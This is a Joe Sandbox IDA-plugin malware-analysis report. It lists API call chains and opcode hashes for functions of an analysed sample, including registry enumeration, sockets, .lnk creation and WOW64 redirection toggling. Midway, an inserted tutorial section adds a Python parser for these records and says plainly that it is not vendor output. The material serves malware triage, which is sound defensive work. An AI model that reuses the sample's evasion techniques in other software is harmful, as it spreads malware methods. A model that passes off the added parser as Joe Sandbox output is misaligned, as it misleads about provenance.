• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
                                                                                                                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3761583154-0
                                                                                                                                                                            • Opcode ID: 18c2ed42f08181e55f729c78dd770cc84611284df4721c97d17246124bd18a54
                                                                                                                                                                            • Instruction ID: 944b66872c7103afe2cfe5956fc6a2a3e7b710042493087c64ea1973d7a5febf
                                                                                                                                                                            • Opcode Fuzzy Hash: 18c2ed42f08181e55f729c78dd770cc84611284df4721c97d17246124bd18a54
                                                                                                                                                                            • Instruction Fuzzy Hash: 2D217F75205208EF9B10AFACDC89CEA77ECFB493647008125F915DB3A0DA70EC4ACB64
APIs
  • Part of subcall function 0085771B: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00857759
  • Part of subcall function 0085771B: GetStockObject.GDI32(00000011), ref: 0085776D
  • Part of subcall function 0085771B: SendMessageW.USER32(00000000,00000030,00000000), ref: 00857777
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 008E4A71
• SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 008E4A7E
• SendMessageW.USER32(?,00000402,00000000,00000000), ref: 008E4A89
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 008E4A98
• SendMessageW.USER32(?,00000404,00000001,00000000), ref: 008E4AA4
Strings
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: MessageSend$CreateObjectStockWindow
• String ID: Msctls_Progress32
• API String ID: 1025951953-3636473452
• Opcode ID: 524981de6fb44a0ed7fdb09d7709b75e5576e39f750f86097ac85e9a8245c9be
• Instruction ID: 834a01ccf106541a915c657fd8445d7b85790e0e6861deb1db6e2e5ebeb57752
• Instruction Fuzzy Hash: 961193B115021DBEEF119F65CC85EE77F9DFF09758F004111FA18E6050C6719C219BA4
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 008BE23D
• LoadStringW.USER32(00000000), ref: 008BE244
• GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 008BE25A
• LoadStringW.USER32(00000000), ref: 008BE261
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 008BE2A5
Strings
• %s (%d) : ==> %s: %s %s, xrefs: 008BE282
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: HandleLoadModuleString$Message
• String ID: %s (%d) : ==> %s: %s %s
• API String ID: 4072794657-3128320259
• Opcode ID: 229e06e9f1b24503db932fee1d691f3edf06044c16c5de995f72957ac0c77555
• Instruction ID: fd6492547474fd31205acaf0c6090d0a97df1311643ca988b264cf9e8833bf24
• Instruction Fuzzy Hash: D50112F6900348BFE71197D4DDC9EE6776CFB08304F004591B745E6151E6749E888B75
APIs
• __WSAFDIsSet.WSOCK32(00000000,?), ref: 008D271D
• #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 008D273E
• WSAGetLastError.WSOCK32 ref: 008D274F
• htons.WSOCK32(?), ref: 008D2838
• inet_ntoa.WSOCK32(?), ref: 008D27E9
  • Part of subcall function 008B4277: _strlen.LIBCMT ref: 008B4281
  • Part of subcall function 008D3B81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,008CF569), ref: 008D3B9D
• _strlen.LIBCMT ref: 008D2892
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
• String ID:
• API String ID: 3203458085-0
• Opcode ID: bf41a9209612583b3f74f12c66589aa9a49e3cb9a621616b7ab967e1b4675b30
• Instruction ID: 6a687a460e4dfde217fa4a72b09a0ff1d9b8271e5965411b90e5af7cae11f843
• Instruction Fuzzy Hash: FDB1B031204340AFD714DF28C895E2ABBA5FFA4318F54865DF4968B3A2DB31ED45CB92
APIs
• __allrem.LIBCMT ref: 0088044A
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00880466
• __allrem.LIBCMT ref: 0088047D
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0088049B
• __allrem.LIBCMT ref: 008804B2
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008804D0
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
• String ID:
• API String ID: 1992179935-0
• Opcode ID: 2c635347f6fb7bc080f97231395b1708db1b00bed18cf3e190c3431c6bc10d53
• Instruction ID: e33b1b1fd12707957a154af1a4707c862d39bdc64bc78337b86a2278606ed96d
• Instruction Fuzzy Hash: C381D572A40706ABE764BE6DDC81B6A73A8FF44328F24412EF611D6391E770D9088F95
APIs
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00878669,00878669,?,?,?,008867DF,00000001,00000001,8BE85006), ref: 008865E8
• MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,008867DF,00000001,00000001,8BE85006,?,?,?), ref: 0088666E
• WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00886768
• __freea.LIBCMT ref: 00886775
  • Part of subcall function 00883BB0: RtlAllocateHeap.NTDLL(00000000,?,?,?,00876A99,?,0000015D,?,?,?,?,008785D0,000000FF,00000000,?,?), ref: 00883BE2
• __freea.LIBCMT ref: 0088677E
• __freea.LIBCMT ref: 008867A3
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: ByteCharMultiWide__freea$AllocateHeap
• String ID:
• API String ID: 1414292761-0
• Opcode ID: 8fd405ad54bf1fadc0b5756a1d3d36412ba2e3352a3568c052f20c6cc1871ddd
• Instruction ID: a064ae009d39cc017f8c862b0d0250be5d0375902e14a46d86d370c4c036499b
• Instruction Fuzzy Hash: 3451BF72601216ABEB25BF64CC82EBA77AAFB44B68B154728F904D6150FB34DC64C790
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0085B25F: _wcslen.LIBCMT ref: 0085B269
                                                                                                                                                                              • Part of subcall function 008DD2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,008DC00D,?,?), ref: 008DD314
                                                                                                                                                                              • Part of subcall function 008DD2F7: _wcslen.LIBCMT ref: 008DD350
                                                                                                                                                                              • Part of subcall function 008DD2F7: _wcslen.LIBCMT ref: 008DD3C7
                                                                                                                                                                              • Part of subcall function 008DD2F7: _wcslen.LIBCMT ref: 008DD3FD
                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008DC629
                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008DC684
                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 008DC6C9
                                                                                                                                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 008DC6F8
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 008DC752
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 008DC75E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1120388591-0
                                                                                                                                                                            • Opcode ID: cd4ae6c4b44fd1288ee0d311b4a5e9afb5cbf210fa616fbe17fed99da1c6e7f7
                                                                                                                                                                            • Instruction ID: af9cc295c53a005cfff0e18804a6cbd0f854f8b6e60bed9f73dfe56f29f2fdba
                                                                                                                                                                            • Opcode Fuzzy Hash: cd4ae6c4b44fd1288ee0d311b4a5e9afb5cbf210fa616fbe17fed99da1c6e7f7
                                                                                                                                                                            • Instruction Fuzzy Hash: 0E816F71208345AFD714DF28C885E2ABBE5FF94308F14855DF4598B2A2DB31ED49CB92
                                                                                                                                                                            APIs
                                                                                                                                                                            • VariantInit.OLEAUT32(00000035), ref: 008B0049
                                                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 008B00F0
                                                                                                                                                                            • VariantCopy.OLEAUT32(008B02F4,00000000), ref: 008B0119
                                                                                                                                                                            • VariantClear.OLEAUT32(008B02F4), ref: 008B013D
                                                                                                                                                                            • VariantCopy.OLEAUT32(008B02F4,00000000), ref: 008B0141
                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 008B014B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3859894641-0
                                                                                                                                                                            • Opcode ID: ae92bbdb39c66a6e341b66eba784bddc8194cd1199ebeab8c2a667d240449265
                                                                                                                                                                            • Instruction ID: 165bb1793964cb7807259200a69da3da733caae4854ee47545497fb1772c6b5b
                                                                                                                                                                            • Opcode Fuzzy Hash: ae92bbdb39c66a6e341b66eba784bddc8194cd1199ebeab8c2a667d240449265
                                                                                                                                                                            • Instruction Fuzzy Hash: 60510935540304EECF25AB689889BAAB3A4FF55314F14804BE906DF396EB709C48CF56
                                                                                                                                                                            APIs
                                                                                                                                                                            • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,008AFB8F,00000000,?,?,00000000,?,008939BC,00000004,00000000,00000000), ref: 008E8BAB
                                                                                                                                                                            • EnableWindow.USER32(?,00000000), ref: 008E8BD1
                                                                                                                                                                            • ShowWindow.USER32(FFFFFFFF,00000000), ref: 008E8C30
                                                                                                                                                                            • ShowWindow.USER32(?,00000004), ref: 008E8C44
                                                                                                                                                                            • EnableWindow.USER32(?,00000001), ref: 008E8C6A
                                                                                                                                                                            • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 008E8C8E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 642888154-0
                                                                                                                                                                            • Opcode ID: e2dec27cc0bdfee8684aa6e903da40566c3a753f763ea8c19960f83572fb51c8
                                                                                                                                                                            • Instruction ID: 1bc07df5fe238feb41b0b6af332d1f9a0a5a67a8f8d3eef412f8d5795caea144
                                                                                                                                                                            • Opcode Fuzzy Hash: e2dec27cc0bdfee8684aa6e903da40566c3a753f763ea8c19960f83572fb51c8
                                                                                                                                                                            • Instruction Fuzzy Hash: 8C415474605284EFDB25CF25C989BA97BE1FB47314F284169E54C8F2A2CB31A845CF50
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0085557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00855558,?,?,00894B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0085559E
                                                                                                                                                                            • _wcslen.LIBCMT ref: 008C61D5
                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 008C62EF
                                                                                                                                                                            • CoCreateInstance.OLE32(008F0CC4,00000000,00000001,008F0B34,?), ref: 008C6308
                                                                                                                                                                            • CoUninitialize.OLE32 ref: 008C6326
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                                                                            • String ID: .lnk
                                                                                                                                                                            • API String ID: 3172280962-24824748
                                                                                                                                                                            • Opcode ID: bd338834dc31ba4ae6006ce7a63785be4ca8f641c6608750c1abaea281017eb6
                                                                                                                                                                            • Instruction ID: bf6e91e900fc858fd5fbe1486fd881c50658a91d15fba498a2b837a16c9cc6dc
                                                                                                                                                                            • Opcode Fuzzy Hash: bd338834dc31ba4ae6006ce7a63785be4ca8f641c6608750c1abaea281017eb6
                                                                                                                                                                            • Instruction Fuzzy Hash: C6D10E716042159FC714DF28C484A2ABBF5FF89714F14886DF88ADB261EB31EC49CB92
                                                                                                                                                                            APIs
                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 008B210F
                                                                                                                                                                            • UnloadUserProfile.USERENV(?,?), ref: 008B211B
                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 008B2124
                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 008B212C
                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 008B2135
                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 008B213C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 146765662-0
                                                                                                                                                                            • Opcode ID: ec95f4ccf6cf78ad0afe2d06c2135e5df0c674e51234fb903c132431e034fcef
                                                                                                                                                                            • Instruction ID: ded97e4078f9badfe0aa9019a72fccce4e47245ae1a6face111cb7f51d4ee8c5
                                                                                                                                                                            • Opcode Fuzzy Hash: ec95f4ccf6cf78ad0afe2d06c2135e5df0c674e51234fb903c132431e034fcef
                                                                                                                                                                            • Instruction Fuzzy Hash: EDE0E576004241BFDB015FA1ED4C90AFF39FF49322B104220F2358A170DB329424DB50
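
The blocks above are the per-function fingerprints that the Joe Sandbox IDA plugin emits: the direct API calls of one function (with "Part of subcall function" lines for calls made inside its callees), the memory dump it was carved from, and the Similarity hashes, where the Opcode ID is a hash over the function's opcodes, so the same Opcode ID in two reports means the same function body. Working with them by eye across hundreds of functions is impractical, so the script below parses the text into records and lets you filter by call chain (for example, the registry enumeration function with RegEnumValueW, or the COM function that carries the ".lnk" string) and intersect Opcode IDs with a second report. This is an added example, not Joe Sandbox code or output: the record layout is inferred from the text of this report, the "Download File" suffix on the Associated lines is the page's own link text and is stripped, and the sample input is two records copied from the report above, trimmed to the lines the parser needs.

```python
"""Parse Joe Sandbox IDA-plugin function fingerprints into records.

Added example, not Joe Sandbox code; the record layout is inferred from the
"APIs / Memory Dump Source / Joe Sandbox IDA Plugin / Similarity" blocks in
this report.
"""
import re
from dataclasses import dataclass, field

# Two records copied from the report above, trimmed; "Download File" is the
# page's download-link text that the extraction fused onto the file name.
SAMPLE = """\
APIs
  • Part of subcall function 0085B25F: _wcslen.LIBCMT ref: 0085B269
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008DC629
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008DC684
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 008DC6F8
• RegCloseKey.ADVAPI32(?), ref: 008DC75E
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
• String ID:
• Opcode ID: cd4ae6c4b44fd1288ee0d311b4a5e9afb5cbf210fa616fbe17fed99da1c6e7f7
• Instruction Fuzzy Hash: 0E816F71208345AFD714DF28C885E2ABBE5FF94308F14855DF4598B2A2DB31ED49CB92
APIs
• _wcslen.LIBCMT ref: 008C61D5
• CoInitialize.OLE32(00000000), ref: 008C62EF
• CoCreateInstance.OLE32(008F0CC4,00000000,00000001,008F0B34,?), ref: 008C6308
• CoUninitialize.OLE32 ref: 008C6326
Strings
Similarity
• API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
• String ID: .lnk
• Opcode ID: bd338834dc31ba4ae6006ce7a63785be4ca8f641c6608750c1abaea281017eb6
"""

# One API line: optional subcall prefix, Name.MODULE, optional (args), "ref: addr".
API_RE = re.compile(
    r"^(?P<sub>Part of subcall function (?P<caller>[0-9A-Fa-f]+): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$"
)
HEADINGS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
LINK_TEXT = "Download File"


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)      # direct calls, in report order
    subcalls: list = field(default_factory=list)  # calls made inside callees
    fields: dict = field(default_factory=dict)    # "Opcode ID", "String ID", ...

    def api_names(self):
        return [a["name"] for a in self.apis]


def parse_records(text):
    """Split plugin output into one FunctionRecord per "APIs" block."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("• ").strip()
        if not line:
            continue
        if line == "APIs":                        # every record opens with this heading
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None or line in HEADINGS:
            continue
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            call = {"name": m["name"], "module": m["module"], "args": args, "ref": m["ref"]}
            if m["sub"]:
                call["caller"] = m["caller"]
                cur.subcalls.append(call)
            else:
                cur.apis.append(call)
            continue
        key, _, value = line.partition(":")       # "Key: value" metadata line
        value = value.strip()
        if value.endswith(LINK_TEXT):             # drop the page's link widget text
            value = value[: -len(LINK_TEXT)].strip()
        if key == "Associated":                   # repeated key: keep every dump
            cur.fields.setdefault(key, []).append(value)
        else:
            cur.fields[key.strip()] = value
    return records


def functions_calling(records, *api_names):
    """Records whose direct call chain contains every named API."""
    wanted = set(api_names)
    return [r for r in records if wanted <= set(r.api_names())]


def shared_opcode_ids(records_a, records_b):
    """Opcode IDs present in both reports: identical function bodies in both samples."""
    ids = lambda rs: {r.fields["Opcode ID"] for r in rs if "Opcode ID" in r.fields}
    return ids(records_a) & ids(records_b)
```

Typical use is `functions_calling(parse_records(report_text), "CoCreateInstance")` to pull out the COM-using functions and read their String ID, and `shared_opcode_ids(parse_records(a), parse_records(b))` to see how much of one sample's code base reappears in another; subcall lines are kept separately so that an API reached only through a callee is not mistaken for a direct call.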
APIs
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008E4794
• IsMenu.USER32(?), ref: 008E47A9
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 008E47F1
• DrawMenuBar.USER32 ref: 008E4804
Strings
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: Menu$Item$DrawInfoInsert
• String ID: 0
• API String ID: 3076010158-4108050209
APIs
  • Part of subcall function 0085B25F: _wcslen.LIBCMT ref: 0085B269
  • Part of subcall function 008B4536: GetClassNameW.USER32(?,?,000000FF), ref: 008B4559
• SendMessageW.USER32(?,00000188,00000000,00000000), ref: 008B26F6
• SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 008B2709
• SendMessageW.USER32(?,00000189,?,00000000), ref: 008B2739
  • Part of subcall function 008584B7: _wcslen.LIBCMT ref: 008584CA
Strings
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: MessageSend$_wcslen$ClassName
• String ID: ComboBox$ListBox
• API String ID: 2081771294-1403004172
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,?,0085637F,?,?,008560AA,?,00000001,?,?,00000000), ref: 0085633E
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00856350
• FreeLibrary.KERNEL32(00000000,?,?,0085637F,?,?,008560AA,?,00000001,?,?,00000000), ref: 00856362
Strings
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: Wow64DisableWow64FsRedirection$kernel32.dll
• API String ID: 145871493-3689287502
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,?,008954C3,?,?,008560AA,?,00000001,?,?,00000000), ref: 00856304
• GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00856316
• FreeLibrary.KERNEL32(00000000,?,?,008954C3,?,?,008560AA,?,00000001,?,?,00000000), ref: 00856329
